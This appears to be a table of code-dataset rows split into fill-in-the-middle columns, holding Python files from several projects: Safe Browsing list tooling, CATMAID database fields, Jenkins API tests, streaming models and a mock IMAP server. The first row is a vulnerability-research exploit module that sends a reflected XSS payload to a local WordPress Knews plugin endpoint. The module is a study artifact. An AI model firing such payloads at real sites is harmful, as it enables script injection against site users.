repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
UMD-SEAM/bugbox | framework/Exploits/Bugtraq_54330.py | Python | bsd-3-clause | 1,719 | 0.009889 |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
import selenium.common.exceptions
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "Bugtraq_54330",
'Description' : "XSS vulnerabiity in Knews 1.1.0, a plugin for Wordpress",
'References' : [["http://www.cvedetails.com/bugtraq-bid/54330/WordPress-Knews-Multilingual-Newsletters-Plugin-Cross-Site-S.html"]],
'Target' : "Wordpress 3.2",
'TargetLicense' : '',
'Plugin' : "Knews 1.1.0",
'VulWikiPage' : "None",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
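# The crafted "ff" parameter below URL-decodes to "><script>alert(123)</script>,
# breaking out of the attribute context to trigger the reflected XSS.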
driver.get("http://127.0.0.1/wordpress/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E")
alert = None
tries = 5
while tries:
alert = driver.switch_to_alert()
try:
text = alert.text
self.verified = True
break
except NoAlertPresentException:
tries -= 1
time.sleep(1)
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
|
rtilder/shavar-list-creation | lists2safebrowsing.py | Python | mpl-2.0 | 13,448 | 0.019557 | #!/usr/bin/env python
import ConfigParser
import hashlib
import json
import os
import re
import sys
import tempfile
import time
import urllib2
import urlparse
import boto.s3.connection
import boto.s3.key
# bring a URL to canonical form as described at
# https://developers.google.com/safe-browsing/developers_guide_v2
def canonicalize(d):
if (not d or d == ""):
return d;
# remove tab (0x09), CR (0x0d), LF (0x0a)
d = re.subn("\t|\r|\n", "", d)[0];
# remove any URL fragment
fragment_index = d.find("#")
if (fragment_index != -1):
d = d[0:fragment_index]
# repeatedly unescape until no more hex encodings
while (1):
_d = d;
d = urllib2.unquote(_d);
# if decoding had no effect, stop
if (d == _d):
break;
# extract hostname (scheme://)(username(:password)@)hostname(:port)(/...)
# extract path
url_components = re.match(
re.compile(
"^(?:[a-z]+\:\/\/)?(?:[a-z]+(?:\:[a-z0-9]+)?@)?([^\/^\?^\:]+)(?:\:[0-9]+)?(\/(.*)|$)"), d);
host = url_components.group(1);
path = url_components.group(2) or "";
path = re.subn("^(\/)+", "", path)[0];
# remove leading and trailing dots
host = re.subn("^\.+|\.+$", "", host)[0];
# replace consecutive dots with a single dot
host = re.subn("\.+", ".", host)[0];
# lowercase the whole thing
host = host.lower();
# percent-escape any characters <= ASCII 32, >= 127, or '#' or '%'
_path = "";
for i in path:
if (ord(i) <= 32 or ord(i) >= 127 or i == '#' or i == '%'):
_path += urllib2.quote(i);
else:
_path += i;
# Note: we do NOT append the scheme
# because safebrowsing lookups ignore it
return host + "/" + _path;
def find_hosts(disconnect_json, allow_list, chunk, output_file, log_file,
add_content_category, name):
"""Finds hosts that we should block from the Disconnect json.
Args:
disconnect_json: A JSON blob containing Disconnect's list.
allow_list: Hosts that we can't put on the blocklist.
chunk: The chunk number to use.
output_file: A file-handle to the output file.
log_file: A file-handle to the log file.
add_content_category: Whether to include the "Content" category.
name: List name used in the summary printed at the end.
"""
# Number of items published
publishing = 0
# Total number of bytes; always a multiple of 32 (0 mod 32)
hashdata_bytes = 0;
# Remember previously-processed domains so we don't print them more than once
domain_dict = {};
# Array holding hash bytes to be written to f_out. We need the total bytes
# before writing anything.
output = [];
categories = disconnect_json["categories"]
for c in categories:
# Skip content and Legacy categories as necessary
if c.find("Legacy") != -1:
continue
if (c.find("Content") != -1 and not add_content_category):
continue
if log_file:
log_file.write("Processing %s\n" % c)
# Objects of type
# { Automattic: { http://automattic.com: [polldaddy.com] }}
# Domain lists may or may not contain the address of the top-level site.
for org in categories[c]:
for orgname in org:
top_domains = org[orgname]
for top in top_domains:
domains = top_domains[top]
for d in domains:
d = d.encode('utf-8');
canon_d = canonicalize(d);
if (not canon_d in domain_dict) and (not d in allow_list):
if log_file:
log_file.write("[m] %s >> %s\n" % (d, canon_d));
log_file.write("[canonicalized] %s\n" % (canon_d));
log_file.write("[hash] %s\n" % hashlib.sha256(canon_d).hexdig | est());
publishing += 1
domain_dict[canon_d] = 1;
hashdata_bytes += 32;
output.append(hashlib.sha256(canon_d).digest());
# Write safebrowsing-list format header
if output_file:
output_file.write("a:%u:32:%s\n" % (chunk, hashdata_bytes));
output_string = "a:%u:32:%s\n" % (chunk, hashdata_bytes);
for o in output:
if output_file:
output_file.write(o);
output_string = output_string + o
print "Tracking protection(%s): publishing %d items; file size %d" \
% (name, publishing, len(output_string))
return output_string
def process_disconnect_entity_whitelist(incoming, chunk, output_file,
log_file, list_variant):
"""
Expects a dict from a loaded JSON blob.
"""
publishing = 0
urls = set()
hashdata_bytes = 0
output = []
for name, entity in sorted(incoming.items()):
name = name.encode('utf-8')
for prop in entity['properties']:
for res in entity['resources']:
prop = prop.encode('utf-8')
res = res.encode('utf-8')
if prop == res:
continue
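# Encode each (property, resource) pair as a pseudo-URL so it can be
# canonicalized and hashed like a regular blocklist entry.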
d = canonicalize('%s/?resource=%s' % (prop, res))
h = hashlib.sha256(d)
if log_file:
log_file.write("[entity] %s >> (canonicalized) %s, hash %s\n"
% (name, d, h.hexdigest()))
urls.add(d)
publishing += 1
hashdata_bytes += 32
output.append(hashlib.sha256(d).digest())
# Write the data file
output_file.write("a:%u:32:%s\n" % (chunk, hashdata_bytes))
# FIXME: we should really sort the output
for o in output:
output_file.write(o)
output_file.flush()
output_size = os.fstat(output_file.fileno()).st_size
print "Entity whitelist (%s): publishing %d items; file size %d" \
% (list_variant, publishing, output_size)
def process_plugin_blocklist(incoming, chunk, output_file, log_file):
publishing = 0
domains = set()
hashdata_bytes = 0
output = []
for d in incoming:
canon_d = canonicalize(d.encode('utf-8'))
if canon_d not in domains:
h = hashlib.sha256(canon_d)
if log_file:
log_file.write("[plugin-blocklist] %s >> (canonicalized) %s, hash %s\n"
% (d, canon_d, h.hexdigest()))
publishing += 1
domains.add(canon_d)
hashdata_bytes += 32
output.append(hashlib.sha256(canon_d).digest())
# Write the data file
output_file.write("a:%u:32:%s\n" % (chunk, hashdata_bytes))
# FIXME: we should really sort the output
for o in output:
output_file.write(o)
output_file.flush()
output_size = os.fstat(output_file.fileno()).st_size
print "Plugin blocklist: publishing %d items; file size %d" \
% (publishing, output_size)
def chunk_metadata(fp):
# Read the first 25 bytes and look for a newline. Since this is a file
# formatted like a chunk, the end of the chunk header (a newline) should be
# found early.
header = fp.read(25)
eoh = header.find('\n')
chunktype, chunknum, hash_size, data_len = header[:eoh].split(':')
return dict(type=chunktype, num=chunknum, hash_size=hash_size, len=data_len,
checksum=hashlib.sha256(fp.read()).hexdigest())
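# For example (illustrative values only), a file starting with
# "a:1523456789:32:64\n" yields
# {'type': 'a', 'num': '1523456789', 'hash_size': '32', 'len': '64', ...}.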
def new_data_to_publish(config, section, blob):
# Get the metadata for our old chunk
# If necessary, fetch the existing data from S3, otherwise open a local file
if ((config.has_option('main', 's3_upload')
and config.getboolean('main', 's3_upload'))
or (config.has_option(section, 's3_upload')
and config.getboolean(section, 's3_upload'))):
conn = boto.s3.connection.S3Connection()
bucket = conn.get_bucket(config.get('main', 's3_bucket'))
s3key = config.get(section, 's3_key') or config.get(section, 'output')
key = bucket.get_key(s3key)
if key is None:
# most likely a new list
print "{0} looks like it hasn't been uploaded to s3://{1}/{2}".format(section, bucket.name, s3key)
key = boto.s3.key.Key(bucket)
key.key = s3key
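# Seed the brand-new key with a dummy 32-byte chunk so the checksum
# comparison below reports new data on the first upload.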
key.set_contents_from_string("a:1:32:32\n" + 32 * '1')
current = tempfile.TemporaryFile()
key.get_contents_to_file(current)
current.seek(0)
else:
current = open(config.get(section, 'output'), 'rb')
old = chunk_metadata(current)
current.close()
new = chunk_metadata(blob)
if old['checksum'] != new['checksum']:
return True
return False
def main():
config = ConfigParser.ConfigParser()
filename = config.read(["shavar_list_creation.ini"])
if not filename:
sys.stderr.write("Error loading shavar_list_creation.ini\n")
sys.exit(-1)
chunknum = int(time.time())
for section in config.sections():
if |
tomka/CATMAID | django/applications/catmaid/fields.py | Python | gpl-3.0 | 15,358 | 0.002409 | # -*- coding: utf-8 -*-
import psycopg2
from psycopg2.extensions import register_adapter, adapt, AsIs
from psycopg2.extras import CompositeCaster, register_composite
import re
from typing import Any, ClassVar, Dict
from django import forms
from django.contrib.postgres.fields import ArrayField
from django.contrib.postgres.forms import SimpleArrayField
from django.core.exceptions import ValidationError
from django.dispatch import receiver, Signal
from django.db import models
from django.db.backends import signals as db_signals
from django.contrib.postgres.functions import TransactionNow
from catmaid.widgets import Double3DWidget, Integer3DWidget, RGBAWidget, DownsampleFactorsWidget
# ------------------------------------------------------------------------
# Classes to support PostgreSQL composite types. Adapted from:
# http://schinckel.net/2014/09/24/using-postgres-composite-types-in-django/
class CompositeFactory(CompositeCaster):
def make(self, values):
return self.composite_python_class(**dict(zip(self.attnames, values)))
_missing_types = {}
class CompositeMeta(type):
composite_python_class: ClassVar
def __init__(cls, name, bases, clsdict):
from django.db import connection
super().__init__(name, bases, clsdict)
cls.register_composite(connection)
def register_composite(cls, connection):
klass = cls()
db_type = klass.db_type(connection)
if db_type:
try:
cls.python_type = register_composite(
str(db_type),
connection.cursor().cursor,
globally=True,
factory=klass.factory_class()
).type
except psycopg2.ProgrammingError:
_missing_types[db_type] = cls
else:
def adapt_composite(composite):
# For safety, `composite_python_class` must have the same
# attributes as the namedtuple `python_type`'s fields, so
# that those can be escaped rather than relying on
# `__str__`.
return AsIs("(%s)::%s" % (
", ".join([
adapt(getattr(composite, field)).getquoted().decode('utf-8') for field in cls.python_type._fields
]), db_type
))
register_adapter(cls.composite_python_class, adapt_composite)
class CompositeField(models.Field, metaclass=CompositeMeta):
"""Base class for PostgreSQL composite fields.
Rather than use psycopg2's default namedtuple types, adapt to a custom
Python type in `composite_python_class` that takes fields as init kwargs.
"""
def factory_class(self):
newclass = type(
str('%sFactory' % type(self.composite_python_class).__name__),
(CompositeFactory,),
{'composite_python_class': self.composite_python_class})
return newclass
composite_type_created = Signal(providing_args=['name'])
# Necessary when running in interactive contexts and from migrations.
@receiver(composite_type_created)
def register_composite_late(sender, db_type, **kwargs):
from django.db import connection
_missing_types.pop(db_type).register_composite(connection)
# Necessary when running in a parallel context (production, test suites).
@receiver(db_signals.connection_created)
def register_composite_connection_created(sender, connection, **kwargs):
for subclass in CompositeField.__subclasses__():
subclass.register_composite(connection)
# ------------------------------------------------------------------------
# Classes to support the integer3d compound type:
class Integer3D(object):
def __init__(self, x=0, y=0, z=0):
self.x, self.y, self.z = x, y, z
integer_re = '[-+0-9]+'
tuple_pattern = re.compile(r'^\((%s),\s*(%s),\s*(%s)\)$' % (integer_re, integer_re, integer_re))
@classmethod
def from_str(cls, s):
m = cls.tuple_pattern.match(s)
if m:
return Integer3D(x=int(m.group(1), 10),
y=int(m.group(2), 10),
z=int(m.group(3), 10))
else:
raise ValidationError("Couldn't parse value as an Integer3D: " + str(s))
def __eq__(self, other):
return isinstance(other, Integer3D) and self.x == other.x and self.y == other.y and self.z == other.z
def __str__(self):
return "(%d, %d, %d)" % (self.x, self.y, self.z)
def to_dict(self) -> Dict[str, Any]:
return {'x': self.x, 'y': self.y, 'z': self.z}
class Integer3DField(CompositeField):
composite_python_class = Integer3D
def formfield(self, **kwargs):
defaults = {'form_class': Integer3DFormField}
defaults.update(kwargs)
return super().formfield(**defaults)
def db_type(self, connection):
return 'integer3d'
def to_python(self, value):
if isinstance(value, Integer3D):
return value
elif (isinstance(value, list) or isinstance(value, tuple)) and len(value) == 3:
return Integer3D(value[0], value[1], value[2])
# When constructing a Location, we get the empty string
# here; return a new Integer3D for any falsy value:
elif not value:
return Integer3D()
else:
return Integer3D.from_str(value)
def get_db_prep_value(self, value, connection, prepared=False):
return self.to_python(value)
# ------------------------------------------------------------------------
# Classes to support the double3d compound type:
class Double3D(object):
def __init__(self, x=0, y=0, z=0):
self.x, self.y, self.z = x, y, z
double_re = r'[-+0-9\.Ee]+'
tuple_pattern = re.compile(r'^\((%s),\s*(%s),\s*(%s)\)$' % (double_re, double_re, double_re))
@classmethod
def from_str(cls, s):
m = cls.tuple_pattern.match(s)
if m:
return Double3D(x=float(m.group(1)),
y=float(m.group(2)),
z=float(m.group(3)))
else:
raise ValidationError("Couldn't parse value from the database as a Double3D: " + str(s))
def __str__(self):
return u"(%.3f, %.3f, %.3f)" % (self.x, self.y, self.z)
class Double3DField(models.Field):
def formfield(self, **kwargs):
defaults = {'form_class': Double3DFormField}
defaults.update(kwargs)
return super().formfield(**defaults)
def db_type(self, connection):
return 'double3d'
def from_db_value(self, value, expression, connection):
if value is None:
return value
return Double3D.from_str(value)
def to_python(self, value):
if isinstance(value, Double3D):
return value
elif (isinstance(value, list) or isinstance(value, tuple)) and len(value) == 3:
return Double3D(value[0], value[1], value[2])
# When constructing a Location, we get the empty string
# here; return a new Double3D for any falsy value:
elif not value or value == '(,,)':
return Double3D()
else:
return Double3D.from_str(value)
def get_db_prep_value(self, value, connection, prepared=False):
value = self.to_python(value)
return "(%f,%f,%f)" % (value.x, value.y, value.z)
# ------------------------------------------------------------------------
# Classes to support the rgba compound type:
class RGBA(object):
def __init__(self, r=0, g=0, b=0, a=0):
self.r, self.g, self.b, self.a = r, g, b, a
double_re = r'[-+0-9\.Ee]+'
tuple_pattern = re.compile(r'^\((%s),\s*(%s),\s*(%s),\s*(%s)\)$' % (double_re, double_re, double_re, double_re))
@classmethod
def from_str(cls, s):
m = cls.tuple_pattern.match(s)
if m:
return RGBA(r=float(m.group(1)),
g=float(m.group(2)),
b=float(m.group(3)),
a=float(m.group(4)))
else:
raise ValidationError("Couldn't parse value as |
AlpacaDB/chainer | chainer/testing/helper.py | Python | mit | 829 | 0 | import pkg_resources
import unittest
def with_requires(*requirements):
"""Run a test case only when given requirements are satisfied.
.. admonition:: Example
This test case runs only when `numpy>=1.10` is installed.
>>> from chainer import testing
... class Test(unittest.TestCase):
... @testing.with_requires('numpy>=1.10')
... def test_for_numpy_1_10(self):
... pass
Args:
requirements: A list of string representing requirement condition to
run a given test case.
"""
ws = pkg_resources.WorkingSet()
try:
ws.require(*requirements)
skip = False
except pkg_resources.VersionConflict:
skip = True
msg = 'requires: {}'.format(','.join(requirements))
return unittest.skipIf(skip, msg)
|
elakamarcus/python | class-inheritance_02.py | Python | gpl-3.0 | 3,445 | 0.004354 | #!/bin/python3
class SpaceShip:
def __init__(self, id, health, x, y):
self.id = id
self.health = int(health)
self.x = x
self.y = y
def __del__(self):
print("{} was destroyed.".format(self.id))
del self
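# Note: "del self" above only removes the local name binding; it does not
# actually destroy the instance or reclaim it immediately.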
def takeDMG(self, hit):
self.health -= hit
if self.health < 0:
del self
def isAlive(self):
if(self.health >= 0):
return True
return False
def isDead(self):
if(self.health <= 0):
return True
return False
def recvHealing(self, hp):
self.health += hp
def shipID(self):
print("|------------------")
print("| Ship ID : {}".format(self.id))
print("| Ship health : {}%".format(self.health))
| print("| Ship location: {}, {}".format(self.x, self.y))
print("|------------------")
class Destroyer(SpaceShip):
def __init__(self, id, health, x, y, weapon, ammo):
super().__init__(id, health, x, y)
self.weapon = weapon
self.ammo = ammo
self.shipclass = "Destroyer"
self.damagerate = 30
def shipinfo(self):
print("|---Destroyer class ship info")
print("| Ship ID :", self.id)
print( | "| Ship type :", self.shipclass)
print("| Ship location: ({}, {})".format(self.x, self.y))
print("| Ship armament:", self.weapon)
print("| Ship ammo : {}%".format(self.ammo))
print("| Ship health : {}%".format(self.health))
print("|----------------------------")
def attackDMG(self, targetship):
print("|---------Attack----------")
print("| {} is firing {} at {}, causing {} damage".format(self.id, self.weapon, targetship.id, self.damagerate))
targetship.takeDMG(self.damagerate)
self.ammo -= 1
print("| {} has {} hp remaining".format(targetship.id, targetship.health))
print("|-------------------------")
class Medic(SpaceShip):
def __init__(self, id, health, x, y, healingrate):
super().__init__(id, health, x, y)
self.healingrate = healingrate
self.shipclass = "Medic"
def shipinfo(self):
print("|---Medic class ship info")
print("| Ship ID :", self.id)
print("| Ship type :", self.shipclass)
print("| Ship location: ({}, {})".format(self.x, self.y))
print("| Ship healing : {} hp/s".format(self.healingrate))
print("| Ship health : {}%".format(self.health))
print("|-------------------------")
def giveHealing(self, ship):
print("|---------Healing---------")
print("| {} is healing {} with {} HP".format(self.id, ship.id, self.healingrate))
ship.recvHealing(self.healingrate)
print("| {}'s health is now {}".format(ship.id, ship.health))
print("|-------------------------")
def __del__(self):
print("{} was destroyed and is no more.".format(self.id))
del self
def spaceMain():
x = Destroyer("Foehammer", 100, 14, 48, "Photon torpedoes", 78)
x.shipinfo()
#x.shipinfo()
y = Medic("Pathways", 100, 13, 50, 50)
y.shipID()
#y.shipID()
#y.shipinfo()
for a in range(5):
x.attackDMG(y)
# while(True):
# x.attackDMG(y)
# if(y.health < 0):
# y.__del__()
# break
def main():
spaceMain()
if __name__ == '__main__':
spaceMain() |
jduan/jenkinsapi | jenkinsapi_tests/unittests/test_nodes.py | Python | mit | 8,323 | 0.000481 | import mock
# To run unittests on python 2.6 please use unittest2 library
try:
import unittest2 as unittest
except ImportError:
import unittest
from jenkinsapi.jenkins import Jenkins
from jenkinsapi.nodes import Nodes
from jenkinsapi.node import Node
class TestNode(unittest.TestCase):
DATA0 = {
'assignedLabels': [{}],
'description': None,
'jobs': [],
'mode': 'NORMAL',
'nodeDescription': 'the master Jenkins node',
'nodeName': '',
'numExecutors': 2,
'overallLoad': {},
'primaryView': {'name': 'All', 'url': 'http://halob:8080/'},
'quietingDown': False,
'slaveAgentPort': 0,
'unlabeledLoad': {},
'useCrumbs': False,
'useSecurity': False,
'views': [
{'name': 'All', 'url': 'http://halob:8080/'},
{'name': 'FodFanFo', 'url': 'http://halob:8080/view/FodFanFo/'}
]
}
DATA1 = {
'busyExecutors': 0,
'computer': [
{
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671924924416
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 3174686720,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671924924416
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'bobnit',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 4261},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/home/sal/jenkins',
'size': 169784860672
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 29},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 4570710016,
'availableSwapSpace': 12195983360,
'totalPhysicalMemory': 8374497280,
'totalSwapSpace': 12195983360
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 249737277440
}
},
'numExecutors': 1,
'offline': True,
'offlineCause': {},
'oneOffExecutors': [],
'temporarilyOffline': False
},
{
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None
},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
],
'displayName': 'nodes',
'totalExecutors': 2
}
DATA2 = {
'actions': [],
'displayName': 'master',
'executors': [{}, {}],
'icon': 'computer.png',
'idle': True,
'jnlpAgent': False,
'launchSupported': True,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': 'Linux (amd64)',
'hudson.node_monitors.ClockMonitor': {'diff': 0},
'hudson.node_monitors.DiskSpaceMonitor': {
'path': '/var/lib/jenkins',
'size': 671942561792
},
'hudson.node_monitors.ResponseTimeMonitor': {'average': 0},
'hudson.node_monitors.SwapSpaceMonitor': {
'availablePhysicalMemory': 2989916160,
'availableSwapSpace': 17163087872,
'totalPhysicalMemory': 16810180608,
'totalSwapSpace': 17163087872
},
'hudson.node_monitors.TemporarySpaceMonitor': {
'path': '/tmp',
'size': 671942561792
}
},
'numExecutors': 2,
'offline': False,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
DATA3 = {
'actions': [],
'displayName': 'halob',
'executors': [{}],
'icon': 'computer-x.png',
'idle': True,
'jnlpAgent': True,
'launchSupported': False,
'loadStatistics': {},
'manualLaunchAllowed': True,
'monitorData': {
'hudson.node_monitors.ArchitectureMonitor': None,
'hudson.node_monitors.ClockMonitor': None,
'hudson.node_monitors.DiskSpaceMonitor': None,
'hudson.node_monitors.ResponseTimeMonitor': None,
'hudson.node_monitors.SwapSpaceMonitor': None,
'hudson.node_monitors.TemporarySpaceMonitor': None},
'numExecutors': 1,
'offline': True,
'offlineCause': None,
'oneOffExecutors': [],
'temporarilyOffline': False
}
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(Nodes, '_poll')
def setUp(self, _poll_nodes, _poll_jenkins):
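# Patch the HTTP polling layer so that Jenkins and Nodes are built from
# the canned fixtures above instead of contacting a live server.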
_poll_jenkins.return_value = self.DATA0
_poll_nodes.return_value = self.DATA1
# def __init__(self, baseurl, nodename, jenkins_obj):
self.J = Jenkins('http://localhost:8080')
self.ns = self.J.get_nodes()
# self.ns = Nodes('http://localhost:8080/computer', 'bobnit', self.J)
def testRepr(self):
# Can we produce a repr string for this object
repr(self.ns)
def testCheckURL(self):
self.assertEquals(self.ns.baseurl, 'http://localhost:8080/computer')
@mock.patch.object(Node, '_poll')
def testGetMasterNode(self, _poll_node):
_poll_node.return_value = self.DATA2
mn = self.ns['master']
self.assertIsInstance(mn, Node)
@mock.patch.object(Node, '_poll')
def testGetNonMasterNode(self, _poll_node):
_poll_node.r |
OpenSight/StreamSwitch | controller/python/streamswitch/wsgiapp/models.py | Python | agpl-3.0 | 6,163 | 0.003894 | """
streamswitch.wsgiapp.models
~~~~~~~~~~~~~~~~~~~~~~~
This module implements the domain models for the WSGI application,
based on the SQLAlchemy's ORM
:copyright: (c) 2015 by OpenSight (www.opensight.cn).
:license: AGPLv3, see LICENSE for more details.
"""
from __future__ import unicode_literals, division
from sqlalchemy import Column, Integer, String, Float, Text, \
orm
from sqlalchemy.ext.declarative import declarative_base
from ..stream_mngr import DEFAULT_LOG_ROTATE, DEFAULT_LOG_SIZE
from ..utils import STRING, encode_json
import json
from ..sender_mngr import LOG_LEVEL_INFO
Base = declarative_base()
class StreamConf(Base):
""" The SQLAlchemy declarative model class for a Stream config object. """
__tablename__ = 'stream_confs'
source_type = Column(String(convert_unicode=True), nullable=False)
stream_name = Column(String(convert_unicode=True), primary_key=True, nullable=False)
url = Column(String(convert_unicode=True), nullable=False)
api_tcp_port = Column(Integer, server_default="0", nullable=False)
log_file = Column(String(convert_unicode=True))
log_size = Column(Integer, server_default="1048576", nullable=False)
log_rotate = Column(Integer, server_default="3", nullable=False)
err_restart_interval = Column(Float, server_default="30.0", nullable=False)
age_time = Column(Float, server_default="0.0", nullable=False)
extra_options_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
other_kwargs_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
def __init__(self, source_type, stream_name, url, api_tcp_port=0, log_file=None, log_size=DEFAULT_LOG_SIZE,
log_rotate=DEFAULT_LOG_ROTATE, err_restart_interval=30.0, age_time=0.0, extra_options={}, **kwargs):
# config
self.stream_name = STRING(stream_name)
self.source_type = STRING(source_type)
self.url = STRING(url)
self.api_tcp_port = int(api_tcp_port)
if log_file is not None:
self.log_file = STRING(log_file)
else:
self.log_file = None
self.log_size = int(log_size)
self.log_rotate = int(log_rotate)
self.err_restart_interval = float(err_restart_interval)
self.age_time = float(age_time)
self.extra_options = dict(extra_options)
self.extra_options_json = STRING(encode_json(self.extra_options))
self.other_kwargs = dict(kwargs)
self.other_kwargs_json = STRING(encode_json(self.other_kwargs))
@orm.reconstructor
def init_on_load(self):
self.extra_options = json.loads(self.extra_options_json)
self.other_kwargs = json.loads(self.other_kwargs_json)
# print("init_on_load")
def __repr__(self):
return "StreamConf Object(stream_name:%s, source_type:%s, " \
"url:%s, api_tcp_port:%d)" % (
self.stream_name, self.source_type, self.url, self.api_tcp_port
)
class SenderConf(Base):
""" The SQLAlchemy declarative model class for a Sender config object. """
__tablename__ = 'sender_confs'
sender_type = Column(String(convert_unicode=True), nullable=False)
sender_name = Column(String(convert_unicode=True), primary_key=True, nullable=False)
dest_url = Column(String(convert_unicode=True), nullable=False)
dest_format = Column(String(convert_unicode=True), server_default="", nullable=False)
stream_name = Column(String(convert_unicode=True), server_default="", nullable=False)
stream_host = Column(String(convert_unicode=True), server_default="", nullable=False)
stream_port = Column(Integer, server_default="0", nullable=False)
log_file = Column(String(convert_unicode=True))
log_size = Column(Integer, server_default="1048576", nullable=False)
log_rotate = Column(Integer, server_default="3", nullable=False)
log_level = Column(Integer, server_default="%d" % LOG_LEVEL_INFO, nullable=False)
err_restart_interval = Column(Float, server_default="30.0", nullable=False)
age_time = Column(Float, server_default="0.0", nullable=False)
extra_options_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
other_kwargs_json = Column(Text(convert_unicode=True), default="{}", nullable=False)
def __init__(self, sender_type, sender_name, dest_url, dest_format="", stream_name="", stream_host="", stream_port=0,
log_file=None, log_size=DEFAULT_LOG_SIZE, log_rotate=DEFAULT_LOG_ROTATE, log_level=LOG_LEVEL_INFO,
err_restart_interval=30.0, age_time=0.0, extra_options={}, event_listener=None,
**kwargs):
# config
self.sender_name = STRING(sender_name)
self.sender_type = STRING(sender_type)
self.dest_url = STRING(dest_url)
self.dest_format = STRING(dest_format)
self.stream_name = STRING(stream_name)
self.stream_host = STRING(stream_host)
self.stream_port = int(stream_port)
if log_file is not None:
self.log_file = STRING(log_file)
else:
self.log_file = None
self.log_size = int(log_size)
self.log_rotate = int(log_rotate)
self.log_level = int(log_level)
self.err_restart_interval = float(err_restart_interval)
self.age_time = float(age_time)
self.extra_options = dict(extra_options)
self.extra_options_json = STRING(encode_json(self.extra_options))
self.other_kwargs = dict(kwargs)
self.other_kwargs_json = STRING(encode_json(self.other_kwargs))
@orm.reconstructor
def init_on_load(self):
self.extra_options = json.loads(self.extra_options_json)
self.other_kwargs = json.loads(self.other_kwargs_json)
# print("init_on_load")
def __repr__(self):
return "SenderConf Object(sender_name:%s, sender_type:%s, " \
"dest_url:%s, stream_name:%s, stream_host:%s, stream_port:%d)" % (
self.sender_name, self.sender_type, self.dest_url,
self.stream_name, self.stream_host, self.stream_port
) |
andrewzwicky/puzzles | CodeEval/test_challenge_7.py | Python | mit | 289 | 0.00346 | from unittest import TestCase
from CodeEval.challenge_7 import challenge
class Challenge7Test(TestCase):
def test_input_1(self):
self.assertEqual(5, challenge("- * / 15 - 7 + 1 1 3 + 2 + 1 1"))
def test_input_2(self):
self.assertEqual(20, challenge("* + 2 3 4")) |
web2py/pydal | pydal/contrib/mockimaplib.py | Python | bsd-3-clause | 10,686 | 0.001684 | # -*- encoding: utf-8 -*-
from imaplib import ParseFlags
# mockimaplib: A very simple mock server module for imap client APIs
# Copyright (C) 2014 Alan Etkin <spametki@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or(at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/lgpl.html>
"""
mockimaplib allows you to test applications connecting to a dummy imap
service. For more details on the api subset implemented,
refer to the imaplib docs.
The client should configure a dictionary to map imap string queries to sets
of entries stored in a message dummy storage dictionary. The module includes
a small set of default message records (SPAM and MESSAGES), two mailboxes
(Draft and INBOX) and a list of query/resultset entries (RESULTS).
Usage:
>>> import mockimaplib
>>> connection = mockimaplib.IMAP4_SSL(<host>)
>>> connection.login(<user>, <password>)
None
>>> connection.select("INBOX")
("OK", ... <mailbox length>)
# fetch commands specifying single uid or message id
# will try to get messages recorded in SPAM
>>> connection.uid(...)
<search query or fetch result>
